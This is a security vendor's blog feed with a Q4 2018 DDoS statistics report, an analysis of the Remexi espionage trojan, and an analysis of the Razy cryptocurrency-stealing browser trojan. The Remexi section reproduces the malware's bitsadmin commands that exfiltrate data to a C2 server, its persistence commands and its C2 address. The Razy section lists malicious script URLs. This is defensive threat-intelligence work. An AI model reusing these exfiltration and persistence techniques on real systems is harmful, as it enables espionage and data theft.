And around Christmas time, the FBI put a stop to 15 DDoS-as-a-Service sites, charging three suspects with running the platforms. The operation is of interest because many of the domains brought down had long escaped the eyes of the law by masquerading as stress testing sites. As the FBI uncovered, some of the services were complicit in a recent string of attacks on gaming portals.

Quarter and year trends

In 2018, we recorded 13% less DDoS activity than in the previous year. A drop in the number of attacks over this period was observed in each quarter, except the third, which outstripped Q3 2017 due to an anomalously active September. The biggest decrease was seen in Q4, with the number of attacks only 70% of the 2017 figure.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Quarterly comparison of the number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% = number of attacks in 2017) (download)

The average duration of attacks in H2 grew steadily over the year: from 95 minutes in Q1 to 218 in Q4.

The most common type of attack by a wide margin is UDP flooding, as reflected in our reports for the last few quarters. However, when comparing attacks by their duration, the situation is quite different. First place goes to HTTP floods and mixed attacks with an HTTP element — they account for around 80% of all DDoS attack activity. Conversely, the UDP attacks we observed this year rarely lasted more than 5 minutes.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of attack duration by type, 2018 (download)

All this suggests that the market for unsophisticated, easy-to-organize attacks continues to shrink, as we predicted would happen. Standard DDoS attacks have been rendered almost pointless by improved anti-UDP flood protection, plus the fact that the technical resources involved are nearly always more profitably deployed for other purposes, such as cryptocurrency mining.

Many short attacks of this kind can be interpreted as simply testing the water (on the off-chance that the target is not secure). It only takes a few minutes for the cybercriminals to figure out that their tools are ineffective and call off the attack.

At the same time, more complex attacks such as HTTP floods, which require time and effort to arrange, remain popular, and their duration is on an upward curve.

These trends look set to develop further in 2019: the total number of attacks will fall amid growth in the duration, power, and impact of well-targeted offensives. A rise in professionalism is also in the cards. Given that most resources are totally unaffected by primitive attempts to disrupt their operation, DDoS attack organizers will have to raise their technical level, as their clients would seek out more professional implementers.

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2018.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • China still tops the leaderboard by number of DDoS attacks, but its share fell quite significantly, from 77.67% to 50.43%. The US retained second position (24.90%), and Australia came third (4.5%). The Top 10 waved goodbye to Russia and Singapore, but welcomed Brazil (2.89%) and Saudi Arabia (1.57%).
  • By geographical distribution of targets, the leaders remain China (43.26%), the US (29.14%), and Australia (5.91%). That said, China’s share fell significantly, while all other Top 10 countries increased theirs.
  • Most of the botnet-based attacks last quarter occurred in October; holiday and pre-holiday periods were calmer. In terms of weekly dynamics, attack activity rose mid-week and decreased towards the end.
  • Q4 witnessed the longest attack seen in recent years, lasting almost 16 days (329 hours). In general, the share of short attacks decreased slightly, but the fluctuations were minor.
  • The share of UDP floods increased significantly to almost a third (31.1%) of all attacks. However, SYN flooding is still leading (58.2%).
  • In connection with the rising number of Mirai C&C servers, the shares of the US (43.48%), Britain (7.88%), and the Netherlands (6.79%) increased.
Attack geography

In the last quarter of 2018, China still accounted for most DDoS attacks. However, its share was down by more than 20 p.p.: from 77.67% to 50.43%.

Meanwhile, the share of the US, which took second place, almost doubled to 24.90%. As in the previous quarter, bronze went to Australia. Its share also practically doubled: from 2.27% to 4.5%. Hong Kong’s share rose only slightly (from 1.74% to 1.84%), causing it to drop to sixth place, ceding fourth position to Brazil. The latter’s indicators had been quite modest up to now, but this quarter its share was 2.89%.

An unexpected newcomer in the ranking was Saudi Arabia, whose share climbed to 1.57%, good enough for seventh spot. This time, the Top 10 had no room for Russia and Singapore. South Korea, having ranked in the Top 3 for several years before dropping to 11th in Q3, not only failed to return to the Top 10, but fell even lower, nosediving to 25th.

The shares of the other top-tenners also increased compared with summer and early fall. The same applies to the total share of countries outside the Top 10 — it increased by more than 5 p.p., from 2.83% to 7.90%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by country, Q3 and Q4 2018 (download)

The distribution of targets by country corresponds to the distribution pattern for number of attacks: China still leads, but its share fell by just over 27 p.p., from 70.58% to 43.26%. The US remains second, although its share grew from 17.05% to 29.14%. Third place again belongs to Australia, also with an increased share (5.9%).

Russia and South Korea, until recently considered Top 10 regulars, slipped well down — as in the rating by number of attacks, they finished 17th and 25th, respectively. They were replaced by new entrants Brazil (2.73%) in fourth place and Saudi Arabia (2.23%) in fifth. The shares of all other countries, as in the previous ranking, also rose slightly. Twofold growth was observed in the case of Canada (from 1.09% to 2.21%), whose results in the past few quarters have fluctuated around 1%, never exceeding 1.5%.

The share of the countries outside of Top 10 almost tripled: from 3.64% to 9.32%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2018 (download)

Dynamics of the number of DDoS attacks

Most of the attack peaks occurred at the start of the quarter (October), with another small surge of activity coming in early December. Unlike last year, there were no clear-cut spikes connected to the autumn and winter holidays, rather the opposite: post-festive periods were quieter. The stormiest days were October 16 and 18, and December 4; the calmest was December 27.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Dynamics of the number of DDoS attacks in Q4 2018  (download)

Whereas Q3 attacks were distributed relatively evenly over the days of the week, in Q4 the differences were more pronounced. The quietest day was Sunday (12.02% of attacks), the most active was Thursday: 15.74% of DDoS attacks occurred mid-week. Some correlation can be seen here with the distribution of attacks by date: both weekends and holidays in the previous quarter were calmer.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by day of the week, Q3 and Q4 2018 (download)

Duration and types of DDoS attacks

The longest Q4 attack we monitored lasted a near record-breaking 329 hours (almost 14 days); for a longer attack, we have to go back to late 2015. That is approximately 1.5 times the duration of the previous quarter’s longest attack of 239 hours (about 10 days).

The total share of attacks longer than 140 hours in the previous quarter increased only slightly (+0.01 p.p.) to 0.11%. The proportion of relatively long attacks (50–139 hours) also increased, from 0.59% to 1.15%. However, the most significant rise was observed in the category of 5–9 hour attacks: from 5.49% to 9.40%.

Accordingly, the share of short attacks less than 4 hours in duration decreased slightly, to 83.34%. For comparison, in Q3 they accounted for 86.94% of all attacks.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2018 (download)

The distribution of attacks by type in the last quarter underwent a bit of a shakeup. SYN flooding remains the most common, but its share dropped from 83.20% to 58.20%. That allowed UDP flooding to increase its share to almost a third of all types of DDoS attacks (31.10%), up from the more modest 11.90% in Q3.

In third place was TCP flooding, whose share also rose — to 8.40%. The share of attacks via HTTP dropped to 2.20%. In last place again, with its share falling to 0.10%, was ICMP flooding.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by type, Q4 2018 (download)

The ratio of Windows and Linux botnets barely moved against Q3. The share of Linux botnets increased slightly, up to 97.11%. Accordingly, the share of Windows botnets dropped by the same margin (1.25 p.p.) to 2.89%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2018 (download)

Botnet distribution geography

The US remains out in front in terms of botnet C&C server hosting, even extending its lead from 37.31% to 43.48%. Slipping to seventh, Russia (4.08%) ceded second place to Britain (7.88%). Bronze went to the Netherlands, whose share increased from 2.24% to 6.79%. Significantly, all this growth is attributable to the rising number of Mirai C&C servers.

Italy and the Czech Republic vacated the Top 10 of botnet-rich countries, while Germany (5.43%) and Romania (3.26%) moved in. China (2.72%) continues to lose ground, clinging on to tenth position in Q4.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of botnet C&C servers by country, Q4 2018 (download)

Conclusion

For the third quarter in a row, the Top 10 ratings of countries by number of attacks, targets, and botnet C&C servers continue to fluctuate. Growth in DDoS activity is strongest where previously it was relatively low, while the once-dominant countries have seen a decline. This could well be the result of successful law enforcement and other initiatives to combat botnets. Another reason could be the emergence of better communications infrastructure in regions where DDoS attacks used to be infeasible.

If the trend continues, next quarter’s Top 10 will likely feature some more new entries, and in the long run, the shares of different countries could start to even out.

2019. január 30.

Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not accessible any more at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

Utility Usage extract.exe Deploys modules from the .cab file into the working Event Cache directory bitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data taskkill.exe Ends working cycle of modules Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it finds possible add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager. All such indicators of comprometation are mentioned in correspondent appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

Command Description search Searches for corresponding files search&upload Encrypts and adds the corresponding files to the upload directory with the provided name uploadfile Encrypts and adds the specified file to the upload directory with the provided name uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name shellexecute Silently executes received command with cmd.exe wmic Silently executes received command with wmic.exe (for WMI commands) sendIEPass Encrypts and adds all gathered browser data into files for upload to C2 uninstall Removes files, directory and BITS tasks Cryptography

To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field Sample value Description diskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio captureScreenTimeOut 72 Probability of full and active window screenshots being taken after mouse click captureActiveWindowTimeOut 313 captureScreenQC 40 Not really used. Probably full and active window screenshot quality captureActiveQC 40 CaptureSites VPN*0,0
Login*0,0
mail*0,0
Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook important upLog.txt
upSCRLog.txt
upSpecial.txt
upFile.txt
upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2 Servers http://108.61.189.174 Control server HTTP URL ZipPass KtJvOXulgibfiHk Password for uploaded zip archives browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.

Main module (events.exe) SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 MD5 c981273c32b581de824e1fd66a19a281 Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler Type I386 Windows GUI EXE Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID Thread description 1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility 2 Decrypts command from registry using RC4 with a hardcoded key, and executes it 3 Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi) 4 Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies 5 Checks network connection, encrypts and sends gathered logs 6 Unhooks mouse and keyboard, removes bitsadmin task 7 Checks if malware’s working directory size already exceeds its threshold 8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file> http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name> Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff MD5 1ff40e79d673461cd33bd8b68f8bb5b8 Compiled 2017.08.06 11:32:36 (GMT), 2.22 Type I386 Windows Console EXE Size 101 888

Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:

Parameter Description -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”) -ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>" Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1FF40E79D673461CD33BD8B68F8BB5B8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
And bitsadmin.exe task to external network resources, addressed by IP addresses

2019. január 24.

Razy in search of cryptocurrency

Last year, we discovered malware that installs a malicious browser extension on its victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. Kaspersky Lab products detect the malicious program as Trojan.Win32.Razy.gen – an executable file that spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software.

Razy serves several purposes, mostly related to the theft of cryptocurrency. Its main tool is the script main.js that is capable of:

  • Searching for addresses of cryptocurrency wallets on websites and replacing them with the threat actor’s wallet addresses
  • Spoofing images of QR codes pointing to wallets
  • Modifying the web pages of cryptocurrency exchanges
  • Spoofing Google and Yandex search results
Infection

The Trojan Razy ‘works’ with Google Chrome, Mozilla Firefox and Yandex Browser, though it has different infection scenarios for each browser type.

Mozilla Firefox

For Firefox, the Trojan installs an extension called ‘Firefox Protection’ with the ID {ab10d63e-3096-4492-ab0e-5edcf4baf988} (folder path: “%APPDATA%\Mozilla\Firefox\Profiles\.default\Extensions\{ab10d63e-3096-4492-ab0e-5edcf4baf988}”).

For the malicious extension to start working, Razy edits the following files:

  • “%APPDATA%\Mozilla\Firefox\Profiles\.default\prefs.js”,
  • “%APPDATA%\Mozilla\Firefox\Profiles\.default\extensions.json”,
  • “%PROGRAMFILES%\Mozilla Firefox\omni.js”.
Yandex Browser

The Trojan edits the file ‘%APPDATA%\Yandex\YandexBrowser\Application\\browser.dll’ to disable extension integrity check. It renames the original file ‘browser.dll_’ and leaves it in the same folder.

To disable browser updates, it creates the registry key ‘HKEY_LOCAL_MACHINE\SOFTWARE\Policies\YandexBrowser\UpdateAllowed” = 0 (REG_DWORD).

Then the extension Yandex Protect is installed to folder ‘%APPDATA%\Yandex\YandexBrowser\User Data\Default\Extensions\acgimceffoceigocablmjdpebeodphgc\6.1.6_0’. The ID acgimceffoceigocablmjdpebeodphgc corresponds to a legitimate extension for Chrome called Cloudy Calculator, version 6.1.6_0. If this extension has already been installed on the user’s device in Yandex Browser, it is replaced with the malicious Yandex Protect.

Google Chrome

Razy edits the file ‘%PROGRAMFILES%\Google\Chrome\Application\\chrome.dll’ to disable the extension integrity check. It renames the original chrome.dll file chrome.dll_ and leaves it in the same folder.

It creates the following registry keys to disable browser updates:

  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\AutoUpdateCheckPeriodMinutes” = 0 (REG_DWORD)
  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\DisableAutoUpdateChecksCheckboxValue” = 1 (REG_DWORD)
  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\InstallDefault” = 0 (REG_DWORD)
  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\UpdateDefault” = 0 (REG_DWORD)

We have encountered cases where different Chrome extensions were infected. One extension in particular is worth mentioning: Chrome Media Router is a component of the service with the same name in browsers based on Chromium. It is present on all devices where the Chrome browser is installed, although it is not shown in the list of installed extensions. During the infection, Razy modified the contents of the folder where the Chrome Media Router extension was located: ‘%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm’.

Scripts used

Irrespective of the targeted browser type, Razy added the following scripts it brought along to the folder containing the malicious script: bgs.js, extab.js, firebase-app.js, firebase-messaging.js and firebase-messaging-sw.js. The file manifest.json was created in the same folder or was overwritten to ensure these scripts get called.

Left: list of files of the original Chrome Media Router extension.
Right: list of files of the modified Chrome Media Router extension.

The scripts firebase-app.js, firebase-messaging.js and firebase-messaging-sw.js are legitimate. They belong to the Firebase platform and are used to send statistics to the malicious actor’s Firebase account.

The scripts bgs.js and extab.js are malicious and are obfuscated with the help of the tool obfuscator.io. The former sends statistics to the Firebase account; the latter (extab.js) inserts a call to the script i.js with parameters tag=&did=&v_tag=&k_tag= into each page visited by the user.

In the above example, the script i.js is distributed from the web resource gigafilesnote[.]com (gigafilesnote[.]com/i.js?tag=&did=&v_tag=&k_tag=). In other cases, similar scripts were detected in the domains apiscr[.]com, happybizpromo[.]com and archivepoisk-zone[.]info.

The script i.js modifies the HTML page, inserts advertising banners and video clips, and adds adverts into Google search results.

YouTube page with banners added by the script i.js

The culmination of the infection is main.js – a call to the script is added to each page visited by the user.

Fragment of the script i.js code that inserts the script main.js to web pages.

The script main.js is distributed from the addresses:

  • Nolkbacteria[.]info/js/main.js?_=
  • 2searea0[.]info/js/main.js?_=
  • touristsila1[.]info/js/main.js?_=
  • solkoptions[.]host/js/main.js?_=

The script main.js is not obfuscated and its capabilities can be seen from the function names.

The screenshot above shows the function findAndReplaceWalletAddresses that searches for Bitcoin and Ethereum wallets and replaces them with the addresses of the threat actor’s wallets. Notably, this function works on almost all pages except those located on Google and Yandex domains, as well as on popular domains like instagram.com and ok.ru.

Images of QR codes that point to wallets also get substituted. The substitution occurs when the user visits the web resources gdax.com, pro.coinbase.com, exmo.*, binance.* or when an element with src=’/res/exchangebox/qrcode/’ is detected on the webpage.

As well as the functionality described above, main.js modifies the webpages of the cryptocurrency exchanges EXMO and YoBit. The following script calls are added to the pages’ codes:

  • /js/exmo-futures.js?_= – when exmo.*/ru/* pages are visited
  • /js/yobit-futures.js?_= – when yobit.*/ru/* pages are visited

where is one of the domains nolkbacteria[.]info, 2searea0[.]info, touristsila1[.]info, or archivepoisk-zone[.]info.

These scripts display fake messages to the user about “new features” in the corresponding exchanges and offers to sell cryptocurrency at above market rates. In other words, users are persuaded to transfer their money to the cybercriminal’s wallet under the pretext of a good deal.

Example of a scam message on the EXMO website

Main.js also spoofs Google and Yandex search results. Fake search results are added to pages if the search request search request is connected with cryptocurrencies and cryptocurrency exchanges, or just music downloading or torrents:
  • /(?:^|\s)(gram|телеграм|токен|ton|ico|telegram|btc|биткойн|bitcoin|coinbase|крипта|криптовалюта|,bnrjqy|биржа|бираж)(?:\s|$)/g;
  • /(скачать.*музык|музык.*скачать)/g;
  • /тор?рент/g;

This is how an infected user is enticed to visit infected websites or legitimate cryptocurrency-themed sites where they will see the message described above.

Google search results that were modified by the infected extension

When the user visits Wikipedia, main.js adds a banner containing a request for donations to support the online encyclopedia. The cybercriminals’ wallet addresses are used in place of bank details. The original Wikipedia banner asking for donations (if present) is deleted.

Fake banner on Wikipedia asking for donations

When the user visits the webpage telegram.org, they will see an offer to buy Telegram tokens at an incredibly low price.

The infected extension loads content on the telegram.org site from the phishing web resource ton-ico[.]network

Fake banner shown at telegram.org. The link leads to the phishing website ton-ico[.]network

When users visit the pages of Russian social network Vkontakte (VK), the Trojan adds an advertising banner to it. If a user clicks on the banner, they are redirected to phishing resources (located on the domain ooo-ooo[.]info), where they are prompted to pay a small sum of money now to make a load of money later on.

Fraudulent banner on the vk.com website

Indicators of compromise

